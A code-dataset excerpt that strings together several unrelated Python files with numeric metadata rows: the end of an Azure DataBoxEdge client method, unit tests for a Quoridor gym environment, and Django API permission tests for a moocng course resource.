'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'UploadCertificateRequest')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('UploadCertificateResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
upload_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/uploadCertificate'}
| 48.339138 | 223 | 0.678884 | 5,711 | 52,738 | 6.041499 | 0.050954 | 0.037678 | 0.0473 | 0.029215 | 0.912703 | 0.904907 | 0.896618 | 0.890502 | 0.883981 | 0.883228 | 0 | 0.002957 | 0.230384 | 52,738 | 1,090 | 224 | 48.383486 | 0.847122 | 0.259396 | 0 | 0.80737 | 0 | 0.005025 | 0.156803 | 0.088229 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048576 | false | 0.0067 | 0.01005 | 0 | 0.125628 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86af85a749a985dad66f60c7e935b119df276fa4 | 9,856 | py | Python | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | 1 | 2020-06-27T08:19:23.000Z | 2020-06-27T08:19:23.000Z | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | null | null | null | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | null | null | null | import random
import unittest
import gym
import numpy as np
from gym_quoridor import quoridorvars
from gym_quoridor.quoridorgame import QuoridorGame
class TestGoEnv(unittest.TestCase):
def setUp(self) -> None:
self.env = gym.make('gym_quoridor:quoridor-v0', size=9, reward_method='real')
def tearDown(self):
self.env.close()
def test_get_init_board(self):
"""Check Initial Board"""
state = self.env.reset()
teststate = np.array([
[ #CHANNEL 0
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 1
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 2
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 3
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 4
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 5
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 6
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 7
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 8
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 9
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 10
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 11
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 12
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
], [ #CHANNEL 13
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
]])
for chnl in range(quoridorvars.NUM_CHNLS):
for x in range(self.env.size):
for y in range(self.env.size):
with self.subTest(f"{chnl,x,y}"):
self.assertEqual(state[chnl,x,y],teststate[chnl,x,y])
def test_start_turn(self):
"""Check Black Starts"""
state = self.env.reset()
self.assertEqual(QuoridorGame.get_player_turn(state),0)
def test_next_turn(self):
"""Check Next Turn Works correctly"""
state = self.env.reset()
state, _, _,_ = self.env.step(1)
self.assertEqual(QuoridorGame.get_player_turn(state),1)
def test_place_v_wall(self):
for x in range(self.env.size-1): #self.env.size-1
for y in range(self.env.size-1): #self.env.size-1
for turn in range(2):
state = self.env.reset()
if turn == 1:
state,_,_,_ = self.env.step(1)
action = QuoridorGame.placement_to_action(state,x,y,0)
state, _, _, _ = self.env.step(action)
with self.subTest(f"{quoridorvars.WHITE_V_WALL_CHNL,x,y}=1,{action},{turn}"):
self.assertEqual(state[quoridorvars.WHITE_V_WALL_CHNL,x,y],1)
pass
else:
action = QuoridorGame.placement_to_action(self.env.state,x,y,0)
state, _, _, _ = self.env.step(action)
with self.subTest(f"{quoridorvars.BLACK_V_WALL_CHNL,x,y}=1,{action}-->{x,y},{turn},{QuoridorGame.__str__(state)}"):
self.assertEqual(state[quoridorvars.BLACK_V_WALL_CHNL,x,y],1)
def test_place_h_wall(self):
for x in range(self.env.size-1): #self.env.size-1
for y in range(self.env.size-1): #self.env.size-1
for turn in range(2):
state = self.env.reset()
if turn == 1:
state, _, _, _ = self.env.step(1)
action = QuoridorGame.placement_to_action(self.env.state,x,y,1)
state, _, _, _ = self.env.step(action)
with self.subTest(f"{quoridorvars.WHITE_H_WALL_CHNL,x,y}=1,{action},{turn}"):
self.assertEqual(state[quoridorvars.WHITE_H_WALL_CHNL,x,y],1)
else:
action = QuoridorGame.placement_to_action(self.env.state,x,y,1)
state, _, _, _ = self.env.step(action)
with self.subTest(f"{quoridorvars.BLACK_H_WALL_CHNL,x,y}=1,{action},{turn}"):
self.assertEqual(state[quoridorvars.BLACK_H_WALL_CHNL,x,y],1)
def test_place_walls_on_existing_walls(self):
for x in range(self.env.size-1):
for y in range(self.env.size-1):
for walltype1 in range(2):
for walltype2 in range(2):
state = self.env.reset()
action = QuoridorGame.placement_to_action(state,x,y,walltype1)
state, _, _, _ = self.env.step(action)
action2 = QuoridorGame.placement_to_action(state,x,y,walltype2)
state, _, _, _ = self.env.step(action2)
total = 0
for chnl in range(quoridorvars.BLACK_V_WALL_CHNL,quoridorvars.WHITE_H_WALL_CHNL+1):
total += state[chnl,x,y]
with self.subTest(f"{x,y,walltype1,walltype2}=>{total}==1,{action,action2},samewalls!{walltype1==walltype2}{state[quoridorvars.BLACK_V_WALL_CHNL,x,y]}{state[quoridorvars.BLACK_H_WALL_CHNL,x,y]}{state[quoridorvars.WHITE_V_WALL_CHNL,x,y]}{state[quoridorvars.WHITE_H_WALL_CHNL,x,y]}"):
self.assertEqual(total,1)
def test_invalid_placement_for_walls(self):
for x in range(self.env.size-1):
for y in range(self.env.size-1):
for walltype1 in range(2):
for walltype2 in range(2):
state = self.env.reset()
action = QuoridorGame.placement_to_action(state,x,y,walltype1)
b,i,j,d = QuoridorGame.valid_placement(state,action)
self.assertTrue(b)
self.assertEqual(x,i)
self.assertEqual(y,j)
self.assertEqual(walltype1,d)
state, _, _, _ = self.env.step(action)
action2 = QuoridorGame.placement_to_action(state,x,y,walltype2)
b,i,j,d = QuoridorGame.valid_placement(state,action2)
self.assertFalse(b)
self.assertEqual(x,i)
self.assertEqual(y,j)
self.assertEqual(walltype2,d)
if __name__ == '__main__':
unittest.main()
| 37.475285 | 294 | 0.429383 | 1,827 | 9,856 | 2.243569 | 0.056377 | 0.530373 | 0.777995 | 1.013906 | 0.799219 | 0.772871 | 0.759941 | 0.725787 | 0.649183 | 0.649183 | 0 | 0.192698 | 0.360795 | 9,856 | 262 | 295 | 37.618321 | 0.457937 | 0.026481 | 0 | 0.758475 | 0 | 0.008475 | 0.058461 | 0.05616 | 0 | 0 | 0 | 0 | 0.067797 | 1 | 0.038136 | false | 0.004237 | 0.025424 | 0 | 0.067797 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
86d929a283a87eac19c07d8dc5655660e14336dc | 17,588 | py | Python | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 36 | 2015-01-10T06:00:36.000Z | 2020-03-19T10:06:59.000Z | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 3 | 2015-10-01T17:59:32.000Z | 2018-09-04T03:32:17.000Z | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 17 | 2015-01-13T03:46:58.000Z | 2020-07-05T06:29:51.000Z | # -*- coding: utf-8 -*-
# Copyright 2012-2013 UNED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from django.utils import simplejson
from moocng.api.tests.outputs import (NO_OBJECTS, BASIC_COURSES, BASIC_COURSE)
from moocng.api.tests.utils import ApiTestCase
class CoursesTestCase(ApiTestCase):
def test_get_courses_annonymous(self):
# TODO: Check not published course
owner = self.create_test_user_owner()
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 401)
def test_get_courses_user(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
self.client = self.django_login_user(self.client, user)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
def test_get_courses_alum(self):
owner = self.create_test_user_owner()
alum1 = self.create_test_user_alum1()
self.client = self.django_login_user(self.client, alum1)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner, student=alum1)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
def test_get_courses_teacher(self):
owner = self.create_test_user_owner()
teacher1 = self.create_test_user_teacher1()
self.client = self.django_login_user(self.client, teacher1)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner, teacher=teacher1)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
def test_get_courses_owner(self):
owner = self.create_test_user_owner()
self.client = self.django_login_user(self.client, owner)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
def test_get_courses_admin(self):
owner = self.create_test_user_owner()
admin = self.create_test_user_admin()
self.client = self.django_login_user(self.client, admin)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
def test_get_courses_userkey(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
key = str(uuid.uuid4())
self.generate_apikeyuser(user, key)
response = self.client.get('/api/%s/course/%s&key=%s' % (self.api_name, self.format_append, key))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, NO_OBJECTS)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/%s&key=%s' % (self.api_name, self.format_append, key))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSES)
class CourseTestCase(ApiTestCase):
# Get course
def test_get_course_annonymous(self):
owner = self.create_test_user_owner()
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 401)
def test_get_course_user(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
self.client = self.django_login_user(self.client, user)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
def test_get_course_alum(self):
owner = self.create_test_user_owner()
alum1 = self.create_test_user_alum1()
self.client = self.django_login_user(self.client, alum1)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner, student=alum1)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
def test_get_course_teacher(self):
owner = self.create_test_user_owner()
teacher1 = self.create_test_user_teacher1()
self.client = self.django_login_user(self.client, teacher1)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner, teacher=teacher1)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
def test_get_course_owner(self):
owner = self.create_test_user_owner()
self.client = self.django_login_user(self.client, owner)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
def test_get_course_admin(self):
owner = self.create_test_user_owner()
admin = self.create_test_user_admin()
self.client = self.django_login_user(self.client, admin)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
def test_get_course_userkey(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
key = str(uuid.uuid4())
self.generate_apikeyuser(user, key)
response = self.client.get('/api/%s/course/1/%s&key=%s' % (self.api_name, self.format_append, key))
self.assertEqual(response.status_code, 404)
self.create_test_basic_course(owner)
response = self.client.get('/api/%s/course/1/%s&key=%s' % (self.api_name, self.format_append, key))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, BASIC_COURSE)
# Change course_slug
def test_change_slug_annonymous(self):
pass
def test_change_slug_user(self):
pass
def test_change_slug_alum(self):
pass
def test_change_slug_teacher(self):
pass
def test_change_slug_owner(self):
pass
def test_change_slug_admin(self):
pass
# Create course
def test_create_course_annonymous(self):
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course_user(self):
user = self.create_test_user_user()
self.client = self.django_login_user(self.client, user)
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course_alum(self):
alum1 = self.create_test_user_alum1()
self.client = self.django_login_user(self.client, alum1)
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course_teacher(self):
teacher1 = self.create_test_user_teacher1()
self.client = self.django_login_user(self.client, teacher1)
response = self.client.get('/api/%s/course/1/%s' % (self.api_name, self.format_append))
self.assertEqual(response.status_code, 404)
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course_owner(self):
owner = self.create_test_user_owner()
self.client = self.django_login_user(self.client, owner)
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course__admin(self):
admin = self.create_test_user_admin()
self.client = self.django_login_user(self.client, admin)
response = self.client.post('/api/%s/course/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_create_course_userkey(self):
user = self.create_test_user_user()
key = str(uuid.uuid4())
self.generate_apikeyuser(user, key)
response = self.client.post('/api/%s/course/%s&key=%s' % (self.api_name, self.format_append, key), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
# Update course
def test_put_course_annonymous(self):
owner = self.create_test_user_owner()
self.create_test_basic_course(owner)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_user(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
self.client = self.django_login_user(self.client, user)
self.create_test_basic_course(owner)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_alum(self):
owner = self.create_test_user_owner()
alum1 = self.create_test_user_alum1()
self.client = self.django_login_user(self.client, alum1)
self.create_test_basic_course(owner, student=alum1)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_teacher(self):
owner = self.create_test_user_owner()
teacher1 = self.create_test_user_teacher1()
self.client = self.django_login_user(self.client, teacher1)
self.create_test_basic_course(owner, teacher=teacher1)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_owner(self):
owner = self.create_test_user_owner()
self.client = self.django_login_user(self.client, owner)
self.create_test_basic_course(owner)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_admin(self):
owner = self.create_test_user_owner()
admin = self.create_test_user_admin()
self.client = self.django_login_user(self.client, admin)
self.create_test_basic_course(owner)
response = self.client.put('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_put_course_userkey(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
key = str(uuid.uuid4())
self.generate_apikeyuser(user, key)
self.create_test_basic_course(owner)
response = self.client.put('/api/%s/course/1/%s&key=%s' % (self.api_name, self.format_append, key), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
# Delete course
def test_delete_course_annonymous(self):
owner = self.create_test_user_owner()
self.create_test_basic_course(owner)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_user(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
self.client = self.django_login_user(self.client, user)
self.create_test_basic_course(owner)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_alum(self):
owner = self.create_test_user_owner()
alum1 = self.create_test_user_alum1()
self.client = self.django_login_user(self.client, alum1)
self.create_test_basic_course(owner, student=alum1)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_teacher(self):
owner = self.create_test_user_owner()
teacher1 = self.create_test_user_teacher1()
self.client = self.django_login_user(self.client, teacher1)
self.create_test_basic_course(owner, teacher=teacher1)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_owner(self):
owner = self.create_test_user_owner()
self.client = self.django_login_user(self.client, owner)
self.create_test_basic_course(owner)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_admin(self):
owner = self.create_test_user_owner()
admin = self.create_test_user_admin()
self.client = self.django_login_user(self.client, admin)
self.create_test_basic_course(owner)
response = self.client.delete('/api/%s/course/1/%s' % (self.api_name, self.format_append), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
def test_delete_course_userkey(self):
owner = self.create_test_user_owner()
user = self.create_test_user_user()
key = str(uuid.uuid4())
self.generate_apikeyuser(user, key)
self.create_test_basic_course(owner)
response = self.client.delete('/api/%s/course/1/%s&key=%s' % (self.api_name, self.format_append, key), simplejson.loads(BASIC_COURSE))
self.assertEqual(response.status_code, 405)
| 39.346756 | 142 | 0.695872 | 2,372 | 17,588 | 4.901771 | 0.055649 | 0.084287 | 0.098736 | 0.083599 | 0.920272 | 0.918896 | 0.908145 | 0.907457 | 0.907113 | 0.907113 | 0 | 0.015882 | 0.183762 | 17,588 | 446 | 143 | 39.434978 | 0.794023 | 0.038208 | 0 | 0.823944 | 0 | 0 | 0.054513 | 0.010417 | 0 | 0 | 0 | 0.002242 | 0.232394 | 1 | 0.144366 | false | 0.021127 | 0.014085 | 0 | 0.165493 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86e061408526bacd5b57f7d5556ca0828c8e2a62 | 27,028 | py | Python | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | tabnine-vim/python/ycm/tests/omni_completer_test.py | MrMonk3y/vimrc | 950230fb3fd7991d1234c2ab516ec03245945677 | [
"MIT"
] | null | null | null | # encoding: utf-8
#
